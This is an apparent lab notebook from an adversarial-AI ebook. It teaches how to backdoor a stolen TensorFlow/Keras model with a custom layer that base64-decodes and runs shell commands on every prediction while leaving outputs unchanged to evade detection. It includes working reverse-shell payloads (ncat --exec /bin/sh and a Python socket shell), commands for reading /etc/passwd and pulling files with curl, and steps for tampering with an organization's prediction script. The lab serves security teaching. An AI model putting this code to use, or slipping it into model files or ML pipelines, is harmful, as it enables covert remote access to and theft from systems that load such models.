<img style="max-width:20em; height:auto;" src="../graphics/A-Little-Book-on-Adversarial-AI-Cover.png"/>

Author: Nik Alleyne   
Author Blog: https://www.securitynik.com   
Author GitHub: github.com/securitynik   

Author Other Books: [   

            "https://www.amazon.ca/Learning-Practicing-Leveraging-Practical-Detection/dp/1731254458/",   
            
            "https://www.amazon.ca/Learning-Practicing-Mastering-Network-Forensics/dp/1775383024/"   
        ]   


This notebook ***(attacking_tf_custom_layers.ipynb)*** is part of the series of notebooks From ***A Little Book on Adversarial AI***  A free ebook released by Nik Alleyne

## Attacking Tensorflow and Keras Custom Layers

- We start here from the previous lab, using the model created. Ensure you completed the previous lab, prior to start this one. If you have not, revisit the notebook **attacking_lambda_layers.ipynb**   

### Lab Objectives:    
- Learn about custom layers   
- Leverage the previous model to use custom layers 
- Expand our knowledge on compromising Keras models  


### Step 1:  

In [8]:
# Import the needed libraries
import tensorflow as tf

In [9]:
# On my system, there is a compatibility issue between my Cuda and Tensorflow
# As a result I disable the GPU by default for Tensorflow.
# If Tensorflow is working fine on your system, then feel free to comment out the lines below

# Comment out this line if your GPU works fine in Tensorflow 
print(f'[-] Disabling the GPU')
tf.config.set_visible_devices(devices=[], device_type='GPU')

print(f'[*] Current logical devices: {tf.config.list_logical_devices()}')
print(f'[*] Current physical devices: {tf.config.list_physical_devices(device_type='GPU')}')

[-] Disabling the GPU
[*] Current logical devices: [LogicalDevice(name='/device:CPU:0', device_type='CPU')]
[*] Current physical devices: [PhysicalDevice(name='/physical_device:GPU:0', device_type='GPU')]


In [10]:
### Version of key libraries used  
print(f'Tensorflow version used:  {tf.__version__}')

Tensorflow version used:  2.19.0


In [11]:
# Load the model that we will be compromising
# Remember, this would be a stolen model
# Simply reusing the model from the last lab : Attacking_Lambda_Layers.ipynb 
stolen_model = tf.keras.models.load_model(filepath='/tmp/zeek_model.keras')
stolen_model.summary()

Model: "simple_model"

┏━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━┓
┃ Layer (type)                    ┃ Output Shape           ┃       Param # ┃
┡━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━┩
│ first_hidden (Dense)            │ (None, 32)             │           256 │
├─────────────────────────────────┼────────────────────────┼───────────────┤
│ second_hidden (Dense)           │ (None, 64)             │         2,112 │
├─────────────────────────────────┼────────────────────────┼───────────────┤
│ output (Dense)                  │ (None, 1)              │            65 │
└─────────────────────────────────┴────────────────────────┴───────────────┘

 Total params: 7,301 (28.52 KB)

 Trainable params: 2,433 (9.50 KB)

 Non-trainable params: 0 (0.00 B)

 Optimizer params: 4,868 (19.02 KB)

Whereas in Lambda we setup a custom function to use with the Lambda layer, in this case, we setup a custom layer called MyCustomLayer. This layer is a subclass of the *keras.layers.layer*.   

### Step 2: 

In [12]:
# Clear any custom objects that might have already been registered
tf.keras.utils.get_custom_objects().clear()

# We will need to register this object
# However, for now, let's assume we did not do this
#@tf.keras.utils.register_keras_serializable(package='malicious_custom_layer', name='malicious_custom_layer')

class MyCustomLayer(tf.keras.layers.Layer):
    # We will add a command parameter to the layer to take the input
    # The command parameter represents our custom commands we would like the model to execute
    # To make this more interesting, we should provide our commands as base64 encoded strings
    # This should make it a bit harder to detect
    # Here is the default command we will use
    # --ssl ensures this communication is also encrypted
    # ncat --verbose --listen 127.0.0.1 --source-port 9999 --keep-open --ssl 
    # This will be base64 encoded
    # Also ensure your listener is setup: 
    # $ ncat --verbose 127.0.0.1 9999 --exec /bin/sh --ssl &
    # bmNhdCAtLXZlcmJvc2UgMTI3LjAuMC4xIDk5OTkgLS1leGVjIC9iaW4vc2ggLS1zc2wgJg==
    def __init__(self, command="bmNhdCAtLXZlcmJvc2UgMTI3LjAuMC4xIDk5OTkgLS1leGVjIC9iaW4vc2ggLS1zc2wgJg==", **kwargs):
        super().__init__()
        self.command = command

    def call(self, x):
        # This is our malicious code being implemented
        import base64
        import os
        os.system(command=base64.b64decode(s=self.command).decode('utf-8'))

        # We return x without modifying it because we want the results to be the same
        # Reduce the chances of detection
        return x 
    
    def get_config(self):
        return {'command' : self.command}

Remember to setup your ncat session $ **ncat --verbose --listen 9999 --ssl**   

In [13]:
# Add the custom layer to the stolen model
stolen_model.add(MyCustomLayer())

# Get the model summary
stolen_model.summary()

Ncat: Version 7.94SVN ( https://nmap.org/ncat )


Model: "simple_model"

┏━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━┓
┃ Layer (type)                    ┃ Output Shape           ┃       Param # ┃
┡━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━┩
│ first_hidden (Dense)            │ (None, 32)             │           256 │
├─────────────────────────────────┼────────────────────────┼───────────────┤
│ second_hidden (Dense)           │ (None, 64)             │         2,112 │
├─────────────────────────────────┼────────────────────────┼───────────────┤
│ output (Dense)                  │ (None, 1)              │            65 │
├─────────────────────────────────┼────────────────────────┼───────────────┤
│ my_custom_layer_1               │ (None, 1)              │             0 │
│ (MyCustomLayer)                 │                        │               │
└─────────────────────────────────┴────────────────────────┴───────────────┘

 Total params: 7,301 (28.52 KB)

 Trainable params: 2,433 (9.50 KB)

 Non-trainable params: 0 (0.00 B)

 Optimizer params: 4,868 (19.02 KB)

With the information shown above, you should now be able interact with the compromised host via your *ncat* session. 

To confirm this worked, go back to your ncat session and you should see that a connection was made.   

At this point, with the custom layer added to the model, we can go ahead and rewrite the model to the file system and overwrite the existing model name.   

For the purpose of this lab, we are creating a new file, just so we have the original copy and the modified file.   
You might also conclude since we were able to see the connection information above, then we are good to go, if we tried to run this from a script.   


Let save the model and test if this works.   


### Step 3:   

In [ ]:
# Save the compromised file back to the file system
tf.keras.models.save_model(model=stolen_model, filepath='/tmp/zeek_pwnd_model_custom_layer.keras', overwrite=True)

Ncat: Subject: CN=localhost
Ncat: Issuer: CN=localhost
Ncat: SHA-1 fingerprint: CD8F C079 7523 F3A7 FE61 F95C 9B78 0A97 D838 7E6D
Ncat: Certificate verification failed (self-signed certificate).
Ncat: SSL connection to 127.0.0.1:9999.
Ncat: SHA-1 fingerprint: CD8F C079 7523 F3A7 FE61 F95C 9B78 0A97 D838 7E6D


Great! We now have the model back in production. Remember, we need to modify the organization's prediction script, so whenever it loads the model, our default command runs. 

**Note: open a command prompt**       
In the command prompt, ensure you are in the *labs* folder.   
Load up the default prediction script : *tf_make_predictions_base_script.py*  and try to make a prediction on your new stolen model:    

$ **python3 ./tf_make_predictions_base_script.py --model /tmp/zeek_pwnd_model_custom_layer.keras --data '[[0.5, 0.2, 0.1, 0.3, 0.0001, 0.00001, 0.0001]]'**

. It is surely to throw an error similar to what you saw before.   
*Exception encountered: Could not locate class 'MyCustomLayer'. Make sure custom classes are decorated with `@keras.saving.register_keras_serializable()`. Full object config: {'module': None, 'class_name': 'MyCustomLayer', 'config': {'command': 'bmNhdCAtLXZlcmJvc2UgMTI3LjAuMC4xIDk5OTkgLS1leGVjIC9iaW4vc2ggLS1zc2wgJg=='}, 'registered_name': 'MyCustomLayer', 'build_config': {'input_shape': [None, 1]}}*

We see above the information about *@keras.saving.register_keras_serializable()*. This means we have to register this object.  

Similarly, like we learned before, let's add the custom layer into the prediction file. We will also register the object there.   

**Note: This is done. If you choose to do it, give the new file a different name**   
- First, save the *tf_make_predictions_base_script.py* as *tf_make_predictions_custom_layer_script.py*      
- **cp tf_make_predictions_base_script.py tf_make_predictions_custom_layer_script.py -v**  

Copy and paste the content below directly after line 15 -> cmd_args = parser.parse_args().    
**Note this file already exists**. However, if you do decided to copy and paste, ensure you create a new copy of the original base prediction file.    

-------------------------------

tf.keras.utils.get_custom_objects().clear()    

@tf.keras.utils.register_keras_serializable(package='malicious_custom_layer',  name='malicious_custom_layer')    
class MyCustomLayer(tf.keras.layers.Layer):   
    def __init__(self, command="bmNhdCAtLXZlcmJvc2UgMTI3LjAuMC4xIDk5OTkgLS1leGVjIC9iaW4vc2ggLS1zc2wgJg==", **kwargs):   
        super().__init__()   
        self.command = command   

    def call(self, x):   
        # This is our malicious code being implemented   
        import base64   
        import os   
        os.system(command=base64.b64decode(s=self.command).decode('utf-8'))   

        # We return x without modifying it because we want the results to be the same    
        # Reduce the chances of detection    
        return x    
    
    def get_config(self):   
        return {'command' : self.command}    

    -----------------------       

After the line with **loaded_model = tf.keras.models.load_model(filepath=cmd_args.model)* which loads the model, then add the custom layer  **loaded_model.add(MyCustomLayer())**    

**Save the file load the model:**      
We could go back to the top and re-run the code. However, let's use a\our python file    **tf_rebuild_model_custom_layer.py** created for this purpose:        
-  **$ python ./tf_rebuild_model_custom_layer.py --model /tmp/zeek_model.keras  --path /tmp/test.keras --command "bmNhdCAtLXZlcmJvc2UgMTI3LjAuMC4xIDk5OTkgLS1leGVjIC9iaW4vc2ggLS1zc2wgJg=="   

Remember to ensure your listener is setup  
$ *ncat --verbose --listen 127.0.0.1 --source-port 9999 --keep-open --ssl*     

**Then run the code to load the model and make a prediction using the path you specified for storing the file**  
$ **python tf_make_predictions_custom_layer_script.py --model /tmp/test.keras --data '[[0.5, 0.2, 0.1, 0.3, 0.8, 0.6, 0.3]]'**


This should result in a connection coming into your listener, giving you access to the remote host.   



### Our script to do what we want    
- By adding the **--command** argument, we make it the attack more interesting, as now we can put any command we wish in the model.   

When we modified the organization's prediction script, we specified the default action which is to get us the shell. Just in case someone finds our activity there, let's add a second mechanism via a vile that allows us to run any commands we want.   

However, this script will have to rebuild the model to inject the malicious code and get the command executed. 

Sample file name: **tf_rebuild_model_custom_layer.py**   

In order to do this, we need to rebuild the pwnd model from a different perspective.

Let's write this as a python code in a separate python file. Open the file **tf_rebuild_model_custom_layer.py**  

We will use CyberChef: https://cyberchef.org to help us encode some values we will pass to the command line. Ensure these values are within quotes

Get the current user information
**id** -> **aWQ=**  

Read the /etc/passwd file  
**cat /etc/passwd** -> **Y2F0IC9ldGMvcGFzc3dk**

Download a file from a remote location via curl  
First start up a simple python http server:  
    $ **python -m http.server 3000**

curl http://127.0.0.1:3000/sensitive_data.tgz --user-agent 'SecurityNik' --output stolen_data.tgz -> Y3VybCBodHRwOi8vMTI3LjAuMC4xOjMwMDAvc2Vuc2l0aXZlX2RhdGEudGd6IC0tdXNlci1hZ2VudCAnU2VjdXJpdHlOaWsnIC0tb3V0cHV0IHN0b2xlbl9kYXRhLnRneg==

Wrap this section up by using a python command. This setups a backdoor:     
Remember to setup your listener: ncat --verbose --listen 9999     
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' &
    -> cHl0aG9uIC1jICdpbXBvcnQgc29ja2V0LHN1YnByb2Nlc3Msb3M7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiMTI3LjAuMC4xIiw5OTk5KSk7b3MuZHVwMihzLmZpbGVubygpLDApOyBvcy5kdXAyKHMuZmlsZW5vKCksMSk7IG9zLmR1cDIocy5maWxlbm8oKSwyKTtwPXN1YnByb2Nlc3MuY2FsbChbIi9iaW4vc2giLCItaSJdKTsnICY=


https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet


You can now re-run the rebuild script with any of these, leveraging the command parameter:   
-  $ **python ./tf_rebuild_model_custom_layer.py --model /tmp/zeek_model.keras --path /tmp/test_model.keras --command aWQ=**        
-  $ **python ./tf_rebuild_model_custom_layer.py --model /tmp/zeek_model.keras --path /tmp/test_model.keras --command Y2F0IC9ldGMvcGFzc3dk**   
-  $ **./tf_rebuild_model_custom_layer.py --model /tmp/zeek_model.keras --path /tmp/test_model.keras --command Y3VybCBodHRwOi8vMTI3LjAuMC4xOjMwMDAvc2Vuc2l0aXZlX2RhdGEudGd6IC0tdXNlci1hZ2VudCAnU2VjdXJpdHlOaWsnIC0tb3V0cHV0IHN0b2xlbl9kYXRhLnRneg==**   
-  $ **python ./tf_rebuild_model_custom_layer.py --model /tmp/zeek_model.keras --path /tmp/test_model.keras --command cHl0aG9uIC1jICdpbXBvcnQgc29ja2V0LHN1YnByb2Nlc3Msb3M7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiMTI3LjAuMC4xIiw5OTk5KSk7b3MuZHVwMihzLmZpbGVubygpLDApOyBvcy5kdXAyKHMuZmlsZW5vKCksMSk7IG9zLmR1cDIocy5maWxlbm8oKSwyKTtwPXN1YnByb2Nlc3MuY2FsbChbIi9iaW4vc2giLCItaSJdKTsnICY=**   
-  

!That is it for Attacking Tensorflow Custom Layers   
### Takeaways:   
- Working with Tensorflow Custom layers   
- Setup backdoors via the custom layers   
- Leveraging Base64 to encode contents to make it a bit difficult to detect   
- Leverage the python argparser to use command line arguments   
- Leverage command line arguments to access any information needed from the compromised  system    